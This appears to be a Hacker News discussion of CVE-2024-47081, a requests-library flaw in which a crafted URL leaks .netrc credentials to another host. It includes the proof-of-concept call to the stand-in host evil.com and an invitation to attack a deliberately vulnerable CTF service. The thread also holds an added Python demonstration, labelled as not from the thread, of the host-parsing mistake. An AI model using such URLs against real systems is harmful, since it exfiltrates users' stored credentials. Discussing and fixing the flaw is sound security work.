
CVE-2024-47081: Netrc credential leak in PSF requests library

https://seclists.org/fulldisclosure/2025/Jun/2
62•jupenur•2d ago

Comments

dcrazy•1d ago
> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
pixl97•1d ago
Execute the call

>requests.get('http://example.com:@evil.com/')

>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call

Instead of having a url parse error it appears to drop the : and use the password:domain format.

woodruffw•1d ago
Another good example of lax URL parsing/parser differentials being problematic.

That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.

w7•1d ago
I think it may be in use by tools without people being aware. I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.

Instead it seems to be populated with what seem to be Heroku API and git credentials.

cozzyd•1d ago
I have it on my laptop because it's the most convenient way to download datasets from various repositories (e.g. NASA Earth Data).
edelbitter•1d ago
Well then go check if you are for some reason using any of the other surprise features [1], like honoring the CURL_CA_BUNDLE env variable, or not honoring the PROXIES env variable if REQUEST_METHOD is set.

1: https://requests.readthedocs.io/en/latest/api/#requests.Sess...

awoimbee•1d ago
That's some horrible url parsing code...

But honestly urllib sucks:

url.hostname doesn't return the port

url.netloc also returns the basic auth part

So you have to f"{u.hostname}:{u.port}"

edelbitter•1d ago
Wait till you see the CPython stdlib email parser..

Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.

janzer•1d ago
Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Daviey•1d ago
Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:

  machine localhost
  login *REDACTED*
  password CTF{*REDACTED*}
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.

dgl•1d ago

  Sorry, you have been blocked
  You are unable to access daviey.com
Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
Daviey•1d ago
That's really strange... because it seems to be working for some people (already have the first solve). I can't see any issues in CF...

EDIT: I had the security in CF too robust, try now?

progbits•23h ago
Edit: Comment removed on request of parent.
Daviey•23h ago
Well done for solving it.. but I'd have preferred you had not shared the solution, it's against the spirit of these sorts of things, but I can't stop you. :)

EDIT: I do appreciate you removing the solution. Have a great day.

audiodude•1d ago
If you, like me, have never heard of a .netrc file...

https://everything.curl.dev/usingcurl/netrc.html

neilv•1d ago
There might be a funny thing with FTP, in which, if a company is using FTP, it's probably for something important.

(Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)

zx8080•1d ago
A funny commit message in the root cause (as stated in the linked post) commit:

> Push code review advice from @sigmavirus24

dfedbeef•1d ago
I feel this
sionisrecur•1d ago
To be fair, the advice from sigmavirus24 was about dealing with decoding the ':' character: https://github.com/psf/requests/pull/2936/files

The code already had `host = ri.netloc.split(':')[0]` before that.

The actual root issue is urlparse doesn't split the host, user, pass and port and trying to do it manually is very error prone:

    urllib.parse.urlparse('http://example.com:@evil.com:8080/')
    ParseResult(scheme='http', netloc='example.com:@evil.com:8080', path='/', params='', query='', fragment='')
Compare this with php:

    parse_url ('http://example.com:@evil.com:8080/')
    [
        "scheme" => "http",
        "host" => "evil.com",
        "port" => 8080,
        "user" => "example.com",
        "pass" => "",
        "path" => "/",
    ]
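The host mix-up pixl97 and sionisrecur describe, as an added Python example that is not from the thread or the requests code base: the naive extractor mirrors the quoted `ri.netloc.split(':')[0]` line, the stricter variant relies on `urlparse(...).hostname` (an assumed fix, not necessarily what the merged patch does), and the .netrc contents are constructed.

```python
import netrc
import os
import tempfile
from urllib.parse import urlparse

# Constructed stand-in for a user's ~/.netrc; the credential is not real.
SAMPLE_NETRC = """machine example.com
login alice
password s3cret-example
"""


def naive_netrc_host(url: str) -> str:
    """Host extraction in the shape of the quoted `ri.netloc.split(':')[0]`.

    netloc still carries the userinfo, so for 'example.com:@evil.com' the
    text before the first ':' is the username, not the host."""
    return urlparse(url).netloc.split(':')[0]


def strict_netrc_host(url: str) -> str:
    """Assumed safer variant: let urlparse split userinfo, host and port."""
    host = urlparse(url).hostname
    if host is None:
        raise ValueError(f"no host in {url!r}")
    return host


def netrc_credentials_for(url, extract_host, netrc_text=SAMPLE_NETRC):
    """Return the (login, password) a .netrc lookup would attach for `url`,
    or None. The constructed text is parsed by the real stdlib netrc parser
    via a temporary file."""
    with tempfile.NamedTemporaryFile("w", suffix=".netrc", delete=False) as fh:
        fh.write(netrc_text)
        path = fh.name
    try:
        entry = netrc.netrc(path).authenticators(extract_host(url))
    finally:
        os.unlink(path)
    if entry is None:
        return None
    login, _account, password = entry
    return login, password


if __name__ == "__main__":
    url = "http://example.com:@evil.com/"
    # Naive: the example.com entry is selected although the request goes to evil.com.
    print("naive  ->", naive_netrc_host(url), netrc_credentials_for(url, naive_netrc_host))
    # Strict: host is evil.com, which has no .netrc entry, so nothing is attached.
    print("strict ->", strict_netrc_host(url), netrc_credentials_for(url, strict_netrc_host))
```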
kidmin•20h ago
and it is from the beginning: https://github.com/psf/requests/commit/79bb9ee1417afe2231972...
Daviey•1d ago
Patch has now been merged, seems the Full Disclosure process works, https://github.com/psf/requests/pull/6965